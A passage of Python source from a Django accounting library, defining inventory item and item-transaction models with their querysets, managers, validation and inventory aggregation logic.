Q(for_inventory=False)\n ) |\n Q(for_inventory=True)\n )\n\n def invoices(self):\n return self.filter(is_product_or_service=True)\n\n def estimates(self):\n return self.invoices()\n\n def purchase_orders(self):\n return self.inventory_all()\n\n\nclass ItemModelManager(models.Manager):\n \"\"\"\n A custom defined ItemModelManager that implement custom QuerySet methods related to the ItemModel\n \"\"\"\n\n def for_entity(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModel associated with a specific EntityModel & UserModel.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.get_queryset()\n if isinstance(entity_slug, lazy_loader.get_entity_model()):\n return qs.filter(\n Q(entity=entity_slug) &\n (\n Q(entity__managers__in=[user_model]) |\n Q(entity__admin=user_model)\n )\n ).select_related('uom')\n return qs.filter(\n Q(entity__slug__exact=entity_slug) &\n (\n Q(entity__managers__in=[user_model]) |\n Q(entity__admin=user_model)\n )\n ).select_related('uom')\n\n def for_entity_active(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of Active ItemModel associated with a specific EntityModel & UserModel.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_active=True)\n\n def for_invoice(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for InvoiceModels for a specific EntityModel &\n UserModel. These types of items qualify as products or services sold.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_product_or_service=True)\n\n def for_bill(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for BillModels for a specific EntityModel &\n UserModel. These types of items qualify as expenses or inventory purchases.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=False)\n ) |\n Q(for_inventory=True)\n )\n\n def for_po(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for PurchaseOrders for a specific EntityModel &\n UserModel. These types of items qualify as inventory purchases.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.inventory_all()\n\n def for_estimate(self, entity_slug: str, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for EstimateModels for a specific EntityModel &\n UserModel. These types of items qualify as products.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.products()\n\n\nclass ItemModelAbstract(CreateUpdateMixIn):\n \"\"\"\n Base implementation of the ItemModel.\n\n Attributes\n ----------\n uuid: UUID\n This is a unique primary key generated for the table. The default value of this field is uuid4().\n name: str\n Human readable name of the ItemModel instance. Maximum of 100 characters.\n item_role: str\n A choice of ITEM_ROLE_CHOICES that determines whether the ItemModel should be treated as an expense, inventory,\n service or product.\n item_type: str\n A choice of ITEM_TYPE_CHOICES that determines whether the ItemModel should be treated as labor, material,\n equipment, lump sum or other.\n uom: UnitOfMeasureModel\n The assigned UnitOfMeasureModel of the ItemModel instance. Mandatory.\n sku: str\n The SKU number associated with the ItemModel instance. Maximum 50 characters.\n upc: str\n The UPC number associated with the ItemModel instance. Maximum 50 characters.\n item_id: str\n EntityModel specific id associated with the ItemModel instance. Maximum 50 characters.\n item_number: str\n Auto generated human-readable item number.\n is_active: bool\n Determines if the ItemModel instance is considered active. Defaults to True.\n default_amount: Decimal\n The default, prepopulated monetary amount of the ItemModel instance .\n for_inventory: bool\n Legacy field used to determine if the ItemModel instance is considered an inventory item. Mandatory.\n Superseded by item_role field. Will be deprecated.\n is_product_or_service: bool\n Legacy field used to determine if the ItemModel instance is considered a product or service item. Mandatory.\n Superseded by item_role field. Will be deprecated.\n sold_as_unit: bool\n Determines if only whole numbers can be used when specifying the quantity on ItemTransactionModels.\n inventory_account: AccountModel\n Inventory account associated with the ItemModel instance. Enforced if ItemModel instance is_inventory() is True.\n inventory_received: Decimal\n Holds the total quantity of the inventory received for the whole EntityModel instance.\n inventory_received_value: Decimal\n Holds the total monetary value of the inventory received for the whole EntityModel instance.\n cogs_account: AccountModel\n COGS account associated with the ItemModel instance. Enforced if ItemModel instance is_inventory() is True.\n earnings_account: AccountModel\n Earnings account associated with the ItemModel instance. Enforced if ItemModel instance is_product() or\n is_service() is True.\n expense_account: AccountModel\n Expense account associated with the ItemModel instance. Enforced if ItemModel instance is_expense() is True.\n additional_info: dict\n Additional user defined information stored as JSON document in the Database.\n entity: EntityModel\n The EntityModel associated with the ItemModel instance.\n \"\"\"\n REL_NAME_PREFIX = 'item'\n\n ITEM_TYPE_LABOR = 'L'\n ITEM_TYPE_MATERIAL = 'M'\n ITEM_TYPE_EQUIPMENT = 'E'\n ITEM_TYPE_LUMP_SUM = 'S'\n ITEM_TYPE_OTHER = 'O'\n ITEM_TYPE_CHOICES = [\n (ITEM_TYPE_LABOR, _('Labor')),\n (ITEM_TYPE_MATERIAL, _('Material')),\n (ITEM_TYPE_EQUIPMENT, _('Equipment')),\n (ITEM_TYPE_LUMP_SUM, _('Lump Sum')),\n (ITEM_TYPE_OTHER, _('Other')),\n ]\n ITEM_TYPE_VALID_CHOICES = {i[0] for i in ITEM_TYPE_CHOICES}\n\n ITEM_ROLE_EXPENSE = 'expense'\n ITEM_ROLE_INVENTORY = 'inventory'\n ITEM_ROLE_SERVICE = 'service'\n ITEM_ROLE_PRODUCT = 'product'\n ITEM_ROLE_CHOICES = [\n ('expense', _('Expense')),\n ('inventory', _('Inventory')),\n ('service', _('Service')),\n ('product', _('Product')),\n ]\n\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n name = models.CharField(max_length=100, verbose_name=_('Item Name'))\n\n # todo: rename this and remove 'id' from it.\n item_id = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('Internal ID'))\n item_number = models.CharField(max_length=30, editable=False, verbose_name=_('Item Number'))\n item_role = models.CharField(max_length=10, choices=ITEM_ROLE_CHOICES, null=True, blank=True)\n item_type = models.CharField(max_length=1, choices=ITEM_TYPE_CHOICES, null=True, blank=True)\n\n uom = models.ForeignKey('django_ledger.UnitOfMeasureModel',\n verbose_name=_('Unit of Measure'),\n on_delete=models.RESTRICT)\n\n sku = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('SKU Code'))\n upc = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('UPC Code'))\n\n is_active = models.BooleanField(default=True, verbose_name=_('Is Active'))\n\n default_amount = models.DecimalField(max_digits=20,\n decimal_places=2,\n default=0,\n verbose_name=_('Default monetary value per unit of measure'),\n validators=[MinValueValidator(0)])\n\n for_inventory = models.BooleanField(verbose_name=_('Is an item for inventory'),\n help_text=_('It is an item you require for your inventory.'))\n\n is_product_or_service = models.BooleanField(verbose_name=_('Is a product or service.'),\n help_text=_(\n 'Is a product or service you sell or provide to customers.'\n ))\n\n sold_as_unit = models.BooleanField(default=False)\n\n inventory_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Inventory Account'),\n related_name=f'{REL_NAME_PREFIX}_inventory_account',\n help_text=_('Inventory account where cost will be capitalized.'),\n on_delete=models.RESTRICT)\n inventory_received = models.DecimalField(\n null=True,\n blank=True,\n decimal_places=3,\n max_digits=20,\n verbose_name=_('Total inventory received.'))\n inventory_received_value = models.DecimalField(\n null=True,\n blank=True,\n decimal_places=2,\n max_digits=20,\n verbose_name=_('Total value of inventory received.'))\n cogs_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('COGS Account'),\n related_name=f'{REL_NAME_PREFIX}_cogs_account',\n help_text=_('COGS account where cost will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n earnings_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Earnings Account'),\n related_name=f'{REL_NAME_PREFIX}_earnings_account',\n help_text=_('Earnings account where revenue will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n expense_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Expense Account'),\n related_name=f'{REL_NAME_PREFIX}_expense_account',\n help_text=_('Expense account where cost will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n\n additional_info = models.JSONField(blank=True,\n null=True,\n default=dict,\n verbose_name=_('Item Additional Info'))\n\n # todo: rename to entity_model...\n entity = models.ForeignKey('django_ledger.EntityModel',\n editable=False,\n on_delete=models.CASCADE,\n verbose_name=_('Item Entity'))\n\n objects = ItemModelManager.from_queryset(queryset_class=ItemModelQuerySet)()\n\n class Meta:\n abstract = True\n unique_together = [\n ('entity', 'item_number')\n ]\n indexes = [\n models.Index(fields=['item_number']),\n models.Index(fields=['item_type']),\n models.Index(fields=['item_role']),\n models.Index(fields=['upc']),\n models.Index(fields=['sku']),\n models.Index(fields=['for_inventory']),\n models.Index(fields=['is_product_or_service']),\n models.Index(fields=['is_active'])\n ]\n\n def __str__(self):\n if self.is_expense():\n return f'Expense: {self.name} | {self.get_item_type_display()}'\n elif self.is_inventory():\n return f'Inventory: {self.name} | {self.get_item_type_display()}'\n elif self.is_service():\n return f'Service: {self.name} | {self.get_item_type_display()}'\n elif self.is_product():\n return f'Product: {self.name}'\n return f'Item Model: {self.name} - {self.sku} | {self.get_item_type_display()}'\n\n def is_expense(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_EXPENSE\n if all([\n not self.is_product_or_service,\n not self.for_inventory\n ]):\n self.item_role = self.ITEM_ROLE_EXPENSE\n return True\n return False\n\n def is_inventory(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_INVENTORY\n\n if all([\n not self.is_product_or_service,\n self.for_inventory,\n ]):\n self.item_role = self.ITEM_ROLE_INVENTORY\n return True\n return False\n\n def is_product(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_PRODUCT\n\n if all([\n self.is_product_or_service,\n self.for_inventory,\n not self.is_labor()\n ]):\n self.item_role = self.ITEM_ROLE_PRODUCT\n return True\n return False\n\n def is_service(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_SERVICE\n if all([\n self.is_product_or_service,\n not self.for_inventory,\n self.is_labor()\n ]):\n self.item_role = self.ITEM_ROLE_SERVICE\n return True\n return False\n\n def product_or_service_display(self):\n if self.is_product():\n return 'product'\n elif self.is_service():\n return 'service'\n\n def is_labor(self):\n return self.item_type == self.ITEM_TYPE_LABOR\n\n def is_material(self):\n return self.item_type == self.ITEM_TYPE_MATERIAL\n\n def is_equipment(self):\n return self.item_type == self.ITEM_TYPE_EQUIPMENT\n\n def is_lump_sum(self):\n return self.item_type == self.ITEM_TYPE_LUMP_SUM\n\n def is_other(self):\n return self.item_type == self.ITEM_TYPE_OTHER\n\n def get_average_cost(self) -> Decimal:\n if self.inventory_received:\n try:\n return self.inventory_received_value / self.inventory_received\n except ZeroDivisionError:\n pass\n return Decimal('0.00')\n\n def get_item_number_prefix(self):\n if self.is_expense():\n return DJANGO_LEDGER_EXPENSE_NUMBER_PREFIX\n elif self.is_inventory():\n return DJANGO_LEDGER_INVENTORY_NUMBER_PREFIX\n elif self.is_product() or self.is_service():\n return DJANGO_LEDGER_PRODUCT_NUMBER_PREFIX\n raise ItemModelValidationError('Cannot determine Item Number prefix for ItemModel. '\n f'For Inventory: {self.for_inventory}, '\n f'IsProductOrService: {self.is_product_or_service}, '\n f'Type: {self.item_type} '\n f'IsLabor: {self.is_labor()} ')\n\n def can_generate_item_number(self) -> bool:\n return all([\n self.entity_id,\n not self.item_number\n ])\n\n def _get_next_state_model(self, raise_exception: bool = True):\n EntityStateModel = lazy_loader.get_entity_state_model()\n\n try:\n LOOKUP = {\n 'entity_model_id__exact': self.entity_id,\n 'key__exact': EntityStateModel.KEY_ITEM\n }\n\n state_model_qs = EntityStateModel.objects.filter(**LOOKUP).select_for_update()\n state_model = state_model_qs.get()\n state_model.sequence = F('sequence') + 1\n state_model.save()\n state_model.refresh_from_db()\n\n return state_model\n except ObjectDoesNotExist:\n\n LOOKUP = {\n 'entity_model_id': self.entity_id,\n 'entity_unit_id': None,\n 'fiscal_year': None,\n 'key': EntityStateModel.KEY_ITEM,\n 'sequence': 1\n }\n state_model = EntityStateModel.objects.create(**LOOKUP)\n return state_model\n except IntegrityError as e:\n if raise_exception:\n raise e\n\n def generate_item_number(self, commit: bool = False) -> str:\n \"\"\"\n Atomic Transaction. Generates the next Vendor Number available.\n @param commit: Commit transaction into VendorModel.\n @return: A String, representing the current InvoiceModel instance Document Number.\n \"\"\"\n if self.can_generate_item_number():\n with transaction.atomic(durable=True):\n\n state_model = None\n while not state_model:\n state_model = self._get_next_state_model(raise_exception=False)\n\n seq = str(state_model.sequence).zfill(DJANGO_LEDGER_DOCUMENT_NUMBER_PADDING)\n self.item_number = f'{self.get_item_number_prefix()}-{seq}'\n\n if commit:\n self.save(update_fields=['item_number'])\n\n return self.item_number\n\n def save(self, **kwargs):\n if self.can_generate_item_number():\n self.generate_item_number(commit=False)\n super(ItemModelAbstract, self).save(**kwargs)\n\n def clean(self):\n\n if self.can_generate_item_number():\n self.generate_item_number(commit=False)\n\n if self.is_expense():\n if not self.expense_account_id:\n raise ItemModelValidationError(_('Items must have an associated expense accounts.'))\n if not self.item_type:\n raise ItemModelValidationError(_('Expenses must have a type.'))\n self.inventory_account = None\n self.earnings_account = None\n self.cogs_account = None\n self.for_inventory = False\n self.is_product_or_service = False\n\n elif self.is_product():\n if not all([\n self.inventory_account_id,\n self.cogs_account_id,\n self.earnings_account_id\n ]):\n raise ItemModelValidationError(_('Products must have Inventory, COGS & Earnings accounts.'))\n if self.is_labor():\n raise ItemModelValidationError(_(f'Product must not be labor...'))\n self.expense_account = None\n self.for_inventory = True\n self.is_product_or_service = True\n\n elif self.is_service():\n if not all([\n self.cogs_account_id,\n self.earnings_account_id\n ]):\n raise ItemModelValidationError(_('Services must have COGS & Earnings accounts.'))\n self.inventory_account = None\n self.expense_account = None\n self.for_inventory = False\n self.is_product_or_service = True\n self.item_type = self.ITEM_TYPE_LABOR\n\n elif self.is_inventory():\n if not all([\n self.inventory_account_id,\n ]):\n raise ItemModelValidationError(_('Items for inventory must have Inventory & COGS accounts.'))\n if not self.item_type:\n raise ItemModelValidationError(_('Inventory items must have a type.'))\n self.expense_account = None\n self.earnings_account = None\n self.for_inventory = True\n self.is_product_or_service = False\n\n\n# ITEM TRANSACTION MODELS...\nclass ItemTransactionModelQuerySet(models.QuerySet):\n\n def is_received(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_RECEIVED)\n\n def in_transit(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_IN_TRANSIT)\n\n def is_ordered(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_ORDERED)\n\n def is_orphan(self):\n return self.filter(\n Q(bill_model_id__isnull=True) &\n Q(po_model_id__isnull=True) &\n Q(ce_model_id__isnull=True)\n )\n\n def get_estimate_aggregate(self):\n return {\n 'ce_cost_estimate__sum': sum(i.ce_cost_estimate for i in self),\n 'ce_revenue_estimate__sum': sum(i.ce_revenue_estimate for i in self),\n 'total_items': len(self)\n }\n\n\nclass ItemTransactionModelManager(models.Manager):\n\n def for_entity(self, user_model, entity_slug):\n qs = self.get_queryset()\n return qs.filter(\n Q(item_model__entity__slug__exact=entity_slug) &\n (\n Q(item_model__entity__admin=user_model) |\n Q(item_model__entity__managers__in=[user_model])\n )\n )\n\n def for_bill(self, user_model, entity_slug, bill_pk):\n qs = self.for_entity(user_model=user_model, entity_slug=entity_slug)\n return qs.filter(bill_model_id__exact=bill_pk)\n\n def for_invoice(self, entity_slug: str, invoice_pk, user_model):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(invoice_model_id__exact=invoice_pk)\n\n def for_po(self, entity_slug, user_model, po_pk):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(po_model__uuid__exact=po_pk)\n\n def for_estimate(self, user_model, entity_slug, cj_pk):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return self.filter(ce_model_id__exact=cj_pk)\n\n def for_contract(self, user_model, entity_slug, ce_pk):\n \"\"\"\n Returns all ItemTransactionModels associated with an EstimateModel.\n @param user_model: UserModel requesting data.\n @param entity_slug: EntityModel slug field value.\n @param ce_pk: EstimateModel UUID.\n @return: ItemTransactionModel QuerySet\n \"\"\"\n qs = self.for_entity(\n entity_slug=entity_slug,\n user_model=user_model\n )\n return qs.filter(\n Q(ce_model_id__exact=ce_pk) |\n Q(po_model__ce_model_id__exact=ce_pk) |\n Q(bill_model__ce_model_id__exact=ce_pk) |\n Q(invoice_model__ce_model_id__exact=ce_pk)\n )\n\n # INVENTORY METHODS....\n def for_entity_inventory(self, entity_slug):\n qs = self.get_queryset()\n return qs.filter(item_model__entity__slug__exact=entity_slug)\n\n # Todo move this to QuerySet....\n def inventory_count(self, entity_slug):\n PurchaseOrderModel = lazy_loader.get_purchase_order_model()\n qs = self.for_entity_inventory(entity_slug)\n qs = qs.filter(\n Q(item_model__for_inventory=True) &\n (\n # received inventory...\n (\n Q(bill_model__isnull=False) &\n Q(po_model__po_status=PurchaseOrderModel.PO_STATUS_APPROVED) &\n Q(po_item_status__exact=ItemTransactionModel.STATUS_RECEIVED)\n ) |\n\n # invoiced inventory...\n (\n Q(invoice_model__isnull=False)\n )\n\n )\n )\n\n return qs.values('item_model_id', 'item_model__name', 'item_model__uom__name').annotate(\n quantity_received=Coalesce(\n Sum('quantity', filter=Q(bill_model__isnull=False) & Q(invoice_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n cost_received=Coalesce(\n Sum('total_amount', filter=Q(bill_model__isnull=False) & Q(invoice_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n quantity_invoiced=Coalesce(\n Sum('quantity', filter=Q(invoice_model__isnull=False) & Q(bill_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n revenue_invoiced=Coalesce(\n Sum('total_amount', filter=Q(invoice_model__isnull=False) & Q(bill_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n ).annotate(\n quantity_onhand=Coalesce(F('quantity_received') - F('quantity_invoiced'), Value(0.0),\n output_field=DecimalField()),\n cost_average=Case(\n When(quantity_received__gt=0.0,\n then=ExpressionWrapper(F('cost_received') / F('quantity_received'),\n output_field=DecimalField(decimal_places=3))\n )\n ),\n value_onhand=Coalesce(\n ExpressionWrapper(F('quantity_onhand') * F('cost_average'),\n output_field=DecimalField(decimal_places=3)), Value(0.0), output_field=DecimalField())\n )\n\n def inventory_pipeline(self, entity_slug):\n qs = self.for_entity_inventory(entity_slug)\n return qs.filter(\n Q(item_model__for_inventory=True) &\n Q(bill_model__isnull=False) &\n Q(po_item_status__in=[\n ItemTransactionModel.STATUS_ORDERED,\n ItemTransactionModel.STATUS_IN_TRANSIT,\n ItemTransactionModel.STATUS_RECEIVED,\n ])\n )\n\n def inventory_pipeline_aggregate(self, entity_slug: str):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.values(\n 'item_model__name',\n 'item_model__uom__name',\n 'po_item_status').annotate(\n total_quantity=Sum('quantity'),\n total_value=Sum('total_amount')\n )\n\n def inventory_pipeline_ordered(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_ORDERED)\n\n def inventory_pipeline_in_transit(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_IN_TRANSIT)\n\n def inventory_pipeline_received(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_RECEIVED)\n\n def inventory_invoiced(self, entity_slug):\n qs = self.for_entity_inventory(entity_slug)\n return qs.filter(\n Q(item_model__for_inventory=True) &\n Q(invoice_model__isnull=False)\n )\n\n\nclass ItemTransactionModelAbstract(CreateUpdateMixIn):\n DECIMAL_PLACES = 2\n\n STATUS_NOT_ORDERED = 'not_ordered'\n STATUS_ORDERED = 'ordered'\n STATUS_IN_TRANSIT = 'in_transit'\n STATUS_RECEIVED = 'received'\n STATUS_CANCELED = 'cancelled'\n\n PO_ITEM_STATUS = [\n (STATUS_NOT_ORDERED, _('Not Ordered')),\n (STATUS_ORDERED, _('Ordered')),\n (STATUS_IN_TRANSIT, _('In Transit')),\n (STATUS_RECEIVED, _('Received')),\n (STATUS_CANCELED, _('Canceled')),\n ]\n\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n entity_unit = models.ForeignKey('django_ledger.EntityUnitModel',\n on_delete=models.RESTRICT,\n blank=True,\n null=True,\n verbose_name=_('Associated Entity Unit'))\n item_model = models.ForeignKey('django_ledger.ItemModel',\n on_delete=models.RESTRICT,\n verbose_name=_('Item Model'))\n bill_model = models.ForeignKey('django_ledger.BillModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Bill Model'))\n invoice_model = models.ForeignKey('django_ledger.InvoiceModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Invoice Model'))\n\n # LEDGER TRANSACTION Fields (Bill/Invoice)....\n quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Quantity'),\n validators=[MinValueValidator(limit_value=0.0)])\n unit_cost = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Cost Per Unit'),\n validators=[MinValueValidator(limit_value=0.0)])\n total_amount = models.DecimalField(max_digits=20,\n editable=False,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n verbose_name=_('Total Amount QTY x UnitCost'),\n validators=[MinValueValidator(limit_value=0.0)])\n\n # Purchase Order fields...\n po_model = models.ForeignKey('django_ledger.PurchaseOrderModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Purchase Order Model'))\n po_quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('PO Quantity'),\n help_text=_('Authorized item quantity for purchasing.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_unit_cost = models.FloatField(null=True,\n blank=True,\n verbose_name=_('PO Unit Cost'),\n help_text=_('Purchase Order unit cost.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_total_amount = models.DecimalField(max_digits=20,\n decimal_places=DECIMAL_PLACES,\n null=True,\n blank=True,\n editable=False,\n verbose_name=_('Authorized maximum item cost per Purchase Order'),\n help_text=_('Maximum authorized cost per Purchase Order.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_item_status = models.CharField(max_length=15,\n choices=PO_ITEM_STATUS,\n blank=True,\n null=True,\n verbose_name=_('PO Item Status'))\n\n # Estimate/Contract fields...\n ce_model = models.ForeignKey('django_ledger.EstimateModel',\n null=True,\n blank=True,\n verbose_name=_('Customer Estimate'),\n on_delete=models.RESTRICT)\n ce_quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimated/Contract Quantity'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_unit_cost_estimate = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimate/Contract Cost per Unit.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_cost_estimate = models.DecimalField(max_digits=20,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n editable=False,\n verbose_name=_('Total Estimate/Contract Cost.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_unit_revenue_estimate = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimate/Contract Revenue per Unit.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_revenue_estimate = models.DecimalField(max_digits=20,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n editable=False,\n verbose_name=_('Total Estimate/Contract Revenue.'),\n validators=[MinValueValidator(limit_value=0.0)])\n item_notes = models.CharField(max_length=400, null=True, blank=True, verbose_name=_('Description'))\n objects = ItemTransactionModelManager.from_queryset(queryset_class=ItemTransactionModelQuerySet)()\n\n class Meta:\n abstract = True\n indexes = [\n models.Index(fields=['bill_model', 'item_model']),\n models.Index(fields=['invoice_model', 'item_model']),\n models.Index(fields=['po_model', 'item_model']),\n models.Index(fields=['ce_model', 'item_model']),\n models.Index(fields=['po_item_status'])\n ]\n\n def __str__(self):\n # pylint: disable=no-member\n\n # amount = f'{currency_symbol}{self.total_amount}'\n if self.po_model_id:\n po_status_display = self.get_po_item_status_display()\n return f'PO Model: {self.po_model_id} | {po_status_display} | {self.po_total_amount}'\n elif self.bill_model_id:\n return f'Bill Model: {self.bill_model_id} | {self.total_amount}'\n elif self.invoice_model_id:\n return f'Invoice Model: {self.invoice_model_id} | {self.total_amount}'\n elif self.ce_model_id:\n return f'Estimate/Contract Model: {self.ce_model_id} | {self.ce_cost_estimate}'\n return f'Orphan {self.__class__.__name__}: {self.uuid}'\n\n def is_received(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is received.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if received, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_RECEIVED\n\n def is_ordered(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is ordered.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if received, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_RECEIVED\n\n def is_canceled(self):\n \"\"\"\n Determines if the ItemModel instance is canceled.\n ItemModel status is only relevant for ItemModels associated with PurchaseOrderModels.\n\n Returns\n -------\n bool\n True if canceled, else False.\n \"\"\"\n return self.po_item_status == self.STATUS_CANCELED\n\n # ItemTransactionModel Associations...\n def has_estimate(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is associated with an EstimateModel.\n\n Returns\n -------\n bool\n True if associated with an EstimateModel, else False.\n \"\"\"\n return self.ce_model_id is not None\n\n def has_po(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance is associated with a PurchaseOrderModel.\n\n Returns\n -------\n bool\n True if associated with an PurchaseOrderModel, else False.\n \"\"\"\n return self.po_model_id is not None\n\n def has_invoice(self):\n \"\"\"\n Determines if the ItemModel instance is associated with a InvoiceModel.\n\n Returns\n -------\n bool\n True if associated with an InvoiceModel, else False.\n \"\"\"\n return self.invoice_model_id is not None\n\n def has_bill(self):\n \"\"\"\n Determines if the ItemModel instance is associated with a BillModel.\n\n Returns\n -------\n bool\n True if associated with an BillModel, else False.\n \"\"\"\n return self.bill_model_id is not None\n\n # TRANSACTIONS...\n def update_total_amount(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance fields according to its associations.\n Calculates and updates total_amount accordingly. Called on every clean() call.\n \"\"\"\n if any([\n self.has_bill(),\n self.has_invoice(),\n self.has_po()\n ]):\n if self.quantity is None:\n self.quantity = 0.0\n\n if self.unit_cost is None:\n self.unit_cost = 0.0\n\n self.total_amount = round(Decimal.from_float(self.quantity * self.unit_cost), self.DECIMAL_PLACES)\n\n if self.has_po():\n\n if self.quantity > self.po_quantity:\n raise ValidationError(f'Billed quantity {self.quantity} cannot be greater than '\n f'PO quantity {self.po_quantity}')\n if self.total_amount > self.po_total_amount:\n raise ValidationError(f'Item amount {self.total_amount} cannot exceed authorized '\n f'PO amount {self.po_total_amount}')\n\n if self.total_amount > self.po_total_amount:\n # checks if difference is within tolerance...\n diff = self.total_amount - self.po_total_amount\n if diff > DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE:\n raise ValidationError(\n f'Difference between PO Amount {self.po_total_amount} and Bill {self.total_amount} '\n f'exceeds tolerance of {DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE}')\n self.total_amount = self.po_total_amount\n return\n\n # PURCHASE ORDER...\n def update_po_total_amount(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance purchase order fields according to its associations.\n Calculates and updates po_total_amount accordingly. Called on every clean() call.\n \"\"\"\n if self.has_po():\n if self.po_quantity is None:\n self.po_quantity = 0.0\n if self.po_unit_cost is None:\n self.po_unit_cost = 0.0\n\n self.po_total_amount = 